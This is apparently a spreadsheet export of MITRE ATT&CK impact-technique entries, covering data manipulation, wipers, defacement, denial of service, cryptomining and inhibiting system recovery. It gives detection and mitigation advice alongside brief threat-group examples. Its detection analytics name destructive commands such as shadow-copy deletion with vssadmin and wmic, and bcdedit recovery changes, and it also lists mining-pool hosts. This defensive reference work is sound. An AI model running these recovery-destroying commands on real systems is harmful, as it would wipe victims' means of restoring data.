Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and manipulate backups.
Restrict File and Directory Permissions
Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk.
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.(Citation: FireEye APT38 Oct 2018)
SUNSPOT
[SUNSPOT](https://attack.mitre.org/software/S0562) created a copy of the SolarWinds Orion software source file with a &lt;code&gt;.bk&lt;/code&gt; extension to backup the original content, wrote [SUNBURST](https://attack.mitre.org/software/S0559) using the same filename but with a &lt;code&gt;.tmp&lt;/code&gt; extension, and then moved [SUNBURST](https://attack.mitre.org/software/S0559) using &lt;code&gt;MoveFileEx&lt;/code&gt; to the original filename with a &lt;code&gt;.cs&lt;/code&gt; extension so it could be compiled within Orion software.(Citation: CrowdStrike SUNSPOT Implant January 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor for networks that solicits and obtains the configuration information of the queried device. 
Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices.
OS API Execution
Monitor for API calls associated with altering data. Remote access tools with built-in features may interact directly with the Windows API to gather information.
Encrypt Sensitive Information
Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK to manipulate SWIFT messages en route to a printer.(Citation: FireEye APT38 Oct 2018)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) is capable of modifying email content, headers, and attachments during transit.(Citation: ESET LightNeuron May 2019)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.(Citation: Securelist Brazilian Banking Malware July 2020)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may modify visual content available internally or externally to an enterprise network. 
File Creation
Monitor for newly constructed visual content for internal or external enterprise networks. 
File Modification
Monitor for changes made to files for unexpected modifications to internal and external websites for unplanned content changes.
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access internal and external websites and services). Consider correlating with application monitoring for indication of unplanned service interruptions or unauthorized content changes.
Data Backup
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments of binaries involved in shutting down or rebooting systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
Host Status
Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) that may suggest the shutting down or rebooting of the system. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.
Process Creation
Monitor for newly executed processes of binaries involved in shutting down or rebooting systems.
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used malware that will issue the command &lt;code&gt;shutdown /r /t 1&lt;/code&gt; to reboot a system after wiping its MBR.(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.(Citation: FireEye APT38 Oct 2018)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has rebooted systems after destroying files and wiping the MBR on infected systems.(Citation: US-CERT SHARPKNOT June 2018)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053)’s Linux variant has terminated ESXi virtual machines.(Citation: Trend Micro AvosLocker Apr 2022)
DCSrv
[DCSrv](https://attack.mitre.org/software/S1033) has a function to sleep for two hours before rebooting the system.(Citation: Checkpoint MosesStaff Nov 2021)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can initiate a system shutdown.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) attempts to reboot the machine by terminating specific processes.(Citation: Trend Micro KillDisk 2)
LockerGoga
[LockerGoga](https://attack.mitre.org/software/S0372) has been observed shutting down infected systems.(Citation: Wired Lockergoga 2019)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) can shutdown and reboot the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)
Maze
[Maze](https://attack.mitre.org/software/S0449) has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.(Citation: Sophos Maze VM September 2020)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) will reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) will shut down the compromised system after it is done modifying system configuration settings.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) will reboot the infected system once the wiping functionality has been completed.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)	
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can shutdown a compromised host through execution of `ExitWindowsEx` with the `EXW_SHUTDOWN` flag.(Citation: Cisco Ukraine Wipers January 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Host Status
Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Filter Network Traffic
When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)
Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)
As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes made to AD settings for unexpected modifications to user accounts, such as deletions or potentially malicious changes to user attributes (credentials, status, etc.).
User Account Deletion
Monitor for unexpected deletions of user accounts. Windows event logs may designate activity associated with an adversary's attempt to remove an account (ex: Event ID 4726 - A user account was deleted)._x005F_x000D_
_x005F_x000D_
Alerting on these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
User Account Modification
Monitor for changes made to user accounts for unexpected modification of properties, such as passwords or status (enabled/disabled). Windows event logs may designate activity associated with an adversary's attempt to remove access to an account:_x005F_x000D_
Event ID 4723 - An attempt was made to change an account's password_x005F_x000D_
Event ID 4724 - An attempt was made to reset an account's password_x005F_x000D_
Event ID 4725 - A user account was disabled_x005F_x000D_
_x005F_x000D_
Alerting on these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has removed a targeted organization's global admin accounts to lock the organization out of all access.(Citation: MSTIC DEV-0537 Mar 2022)
LockerGoga
[LockerGoga](https://attack.mitre.org/software/S0372) has been observed changing account passwords and logging off current users.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) has changed user account passwords and logged users off the system.(Citation: IBM MegaCortex)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) has the ability to change the password of local users on compromised hosts and can log off users.(Citation: Check Point Meteor Aug 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. 
File Creation
Monitor for newly constructed files that may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.
File Modification
Monitor external websites for unplanned content changes.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Data Backup
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may deface systems internal to an organization in an attempt to intimidate or mislead users. 
File Creation
Monitor for newly constructed files that may deface systems internal to an organization in an attempt to intimidate or mislead users.
File Modification
Monitor internal and websites for unplanned content changes.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Data Backup
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has left taunting images and messages on the victims' desktops as proof of system access.(Citation: CERT-EE Gamaredon January 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002).(Citation: Novetta Blockbuster Destructive Malware)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) has set the desktop wallpaper on victims' machines to display a ransom note.(Citation: Minerva Labs Black Basta May 2022)(Citation: BlackBerry Black Basta May 2022)(Citation: Cyble Black Basta May 2022)(Citation: Trend Micro Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Check Point Black Basta October 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can change the desktop wallpaper on compromised hosts.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)
Diavol
 After encryption, [Diavol](https://attack.mitre.org/software/S0659) will capture the desktop background window, set the background color to black, and change the desktop wallpaper to a newly created bitmap image with the text “All your files are encrypted! For more information see “README-FOR-DECRYPT.txt".(Citation: Fortinet Diavol July 2021)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can change both the desktop wallpaper and the lock screen image to a custom image.(Citation: Check Point Meteor Aug 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may indicate common cryptomining or proxyware functionality.
File Creation
Monitor for common cryptomining or proxyware files on local systems that may indicate compromise and resource usage.
Host Status
Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts, look for connections to/from strange ports, as well as reputation of IPs and URLs related cryptocurrency hosts. 
Note: Destination Host Name is not a comprehensive list of potential cryptocurrency URLs. 
&lt;h4&gt;Analytic 1 - Suspicious Port Connections&lt;/h4&gt;
&lt;code&gt;suspicious_netcoms = filter network traffic where ((src_port = “3333” OR src_port = “4444” OR src_port = “5555” OR src_port = “6666”) AND 
(dst_host_name = “cryptmonero.com” OR dst_host_name = “crypto-pool.fr” OR dst_host_name = “crypto-pool.info” OR dst_host_name = “cryptonight-hub.miningpoolhub.com”))&lt;/code&gt;
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Process Creation
Monitor for common cryptomining or proxyware software process names that may indicate compromise and resource usage.
APT41
[APT41](https://attack.mitre.org/groups/G0096) deployed a Monero cryptocurrency mining tool in a victim’s environment.(Citation: FireEye APT41 Aug 2019)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used XMRIG to mine cryptocurrency on victim systems.(Citation: RedCanary Mockingbird May 2020)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has distributed cryptomining malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has deployed XMRig Docker images to mine cryptocurrency.(Citation: Lacework TeamTNT May 2021)(Citation: Cado Security TeamTNT Worm August 2020) [TeamTNT](https://attack.mitre.org/groups/G0139) has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.(Citation: Cisco Talos Intelligence Group)
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) can download an additional module which has a cryptocurrency mining extension.(Citation: ESET ForSSHe December 2018)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has loaded coinmining software onto systems to mine for Koto cryptocurrency. (Citation: Unit42 CookieMiner Jan 2019)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has used xmrig to mine cryptocurrency.(Citation: Unit 42 Hildegard Malware)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has the capability to run a cryptocurrency miner on the victim machine.(Citation: Imminent Unit42 Dec2019)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has created and run a Bitcoin cryptocurrency miner.(Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) harvested system resources to mine cryptocurrency, using XMRig to mine Monero.(Citation: ESET LoudMiner June 2019)	
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.(Citation: Unit 42 Lucifer June 2020)
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.
Drive Access
Monitor for newly constructed drive letters or mount points to a data storage device for attempts to write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.
Drive Modification
Monitor for changes made to drive letters or mount points of data storage devices for attempts to read to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.
Driver Load
Monitor for unusual kernel driver installation activity that may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Process Creation
Monitor newly executed processes that may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Data Backup
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Drive Access
Monitor for newly constructed drive letters or mount points to a data storage device for attempts to write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.
Drive Modification
Monitor for changes made to drive letters or mount points of data storage devices for attempts to read to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.
Driver Load
Monitor for unusual kernel driver installation activity may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Process Creation
Monitor newly executed processes that may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Data Backup
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers. A similar process is then used to wipe content in logical drives and, finally, attempt to wipe every byte of every sector on every drive. WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives. WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.(Citation: Novetta Blockbuster Destructive Malware)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) has the ability to wipe VM snapshots on compromised networks.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to corrupt disk partitions and obtain raw disk access to destroy data.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: SentinelOne Hermetic Wiper February 2022)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) can wipe deleted data from all drives using &lt;code&gt;cipher.exe&lt;/code&gt;.(Citation: IBM MegaCortex)
RawDisk
[RawDisk](https://attack.mitre.org/software/S0364) has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.(Citation: Novetta Blockbuster Destructive Malware)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the accessible physical or logical drives of the infected machine.(Citation: Symantec Elfin Mar 2019)	
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can overwrite sectors of a victim host's hard drive at periodic offsets.(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.
Drive Access
Monitor for newly constructed drive letters or mount points to a data storage device for attempts to write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.
Drive Modification
Monitor for changes made to drive letters or mount points of data storage devices for attempts to read to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.
Driver Load
Monitor for unusual kernel driver installation activity may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.
Process Creation
Monitor newly executed processes that may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.
Data Backup
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.
APT37
[APT37](https://attack.mitre.org/groups/G0067) has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used a custom MBR wiper named BOOTWRECK to render systems inoperable.(Citation: FireEye APT38 Oct 2018)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.(Citation: US-CERT SHARPKNOT June 2018)(Citation: Novetta Blockbuster)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to corrupt the infected system's master boot record.(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)
CaddyWiper
[CaddyWiper](https://attack.mitre.org/software/S0693) has the ability to destroy information about a physical drive's partitions including the MBR, GPT, and partition entries.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to corrupt disk partitions, damage the Master Boot Record (MBR), and overwrite the Master File Table (MFT) of all available physical drives.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) overwrites the first sector of the Master Boot Record with “0x00”.(Citation: Trend Micro KillDisk 1)
RawDisk
[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to help overwrite components of disk structure like the MBR and disk partitions.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) has been seen overwriting features of disk structure such as the MBR.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the master boot record of an infected computer.(Citation: Symantec Elfin Mar 2019)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can overwrite the Master Book Record (MBR) on victim systems with a malicious 16-bit bootloader.(Citation: Microsoft WhisperGate January 2022)(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt. Externally monitor the availability of services that may be targeted by an Endpoint DoS.
Host Status
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)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Filter Network Traffic
Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. To defend against SYN floods, enable SYN Cookies.
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
OnionDuke
[OnionDuke](https://attack.mitre.org/software/S0052) has the capability to use a Denial of Service module.(Citation: ESET Dukes October 2019)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has a feature to perform SYN flood attack on a host.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may target resource intensive features of web applications to cause a denial of service (DoS). In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt. Externally monitor the availability of services that may be targeted by an Endpoint DoS.
Host Status
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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Filter Network Traffic
Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.
Host Status
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)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Filter Network Traffic
Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.(Citation: ESET Industroyer)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may target the different network services provided by systems to conduct a DoS. In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt. Externally monitor the availability of services that may be targeted by an Endpoint DoS.
Host Status
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)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Filter Network Traffic
Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Storage Deletion
Monitor for unexpected deletion of a cloud storage objects (ex: AWS `delete-object`), especially those associated with cloud backups.
Command Execution
Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as `vssadmin`, `wbadmin`, and `bcdedit`.
File Deletion
The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Process Creation
Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as `vssadmin`, `wbadmin`, and `bcdedit`. After compromising a network of systems, threat actors often try to delete/resize Shadow Copy in an attempt to prevent administrators from restoring the systems to versions present before the attack. This is often done via vssadmin, a legitimate Windows tool to interact with shadow copies. This action is often employed by ransomware, may lead to a failure in recovering systems after an attack. The pseudo code detection focus on Windows Security and Sysmon process creation (4688 and 1). The use of wmic to delete shadow copy generates WMI-Activity Operationnal 5857 event and could generate 5858 (if the operation fails). These 2 EventIDs could be interesting when attackers use wmic without process creation and/or for forensics.
&lt;h4&gt;Analytic 1 - Detecting Shadow Copy Deletion or Resize&lt;/h4&gt; 
&lt;code&gt;deleted_copy = filter processes where ((event_id ="4688" OR event_id ="1") (CommandLine="*vssadmin* *delete* *shadows*" OR CommandLine="*wmic* *shadowcopy* *delete*" OR CommandLine="*vssadmin* *resize* *shadowstorage*")) OR (event_id ="5857" ProviderName="MSVSS__PROVIDER") OR (event_id ="5858" Operation="*Win32_ShadowCopy*")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - BCDEdit Failure Recovery Modification&lt;/h4&gt; 
&lt;code&gt;bcdedit_commands = filter processes where (
  exe = "C:\Windows\System32\bcdedit.exe" AND command_line="*recoveryenabled*" )&lt;/code&gt;
Service Metadata
Monitor the status of services involved in system recovery.
Note: For Windows, Event ID 7040 can be used to alert on changes to the start type of a service (e.g., going from enabled at startup to disabled) associated with system recovery. 
Snapshot Deletion
Monitor for unexpected deletion of snapshots (ex: AWS `delete-snapshot`), especially those associated with cloud backups.
Windows Registry Key Modification
Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).
Data Backup
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery. In cloud environments, enable versioning on storage objects where possible, and copy backups to other accounts or regions to isolate them from the original copies.(Citation: Unit 42 Palo Alto Ransomware in Public Clouds 2022)
Operating System Configuration
Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery. Additionally, ensure that WinRE is enabled using the following command: &lt;code&gt;reagentc /enable&lt;/code&gt;.(Citation: reagentc_cmd)
User Account Management
Limit the user accounts that have access to backups to only those required.
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMIC and vssadmin to manually delete volume shadow copies. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used [Conti](https://attack.mitre.org/software/S0575) ransomware to delete volume shadow copies automatically with the use of vssadmin.(Citation: Mandiant FIN12 Oct 2021) 
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) deletes backups and shadow copies using native system tools.(Citation: Hornet Security Avaddon June 2020)(Citation: Arxiv Avaddon Feb 2021)
Babuk
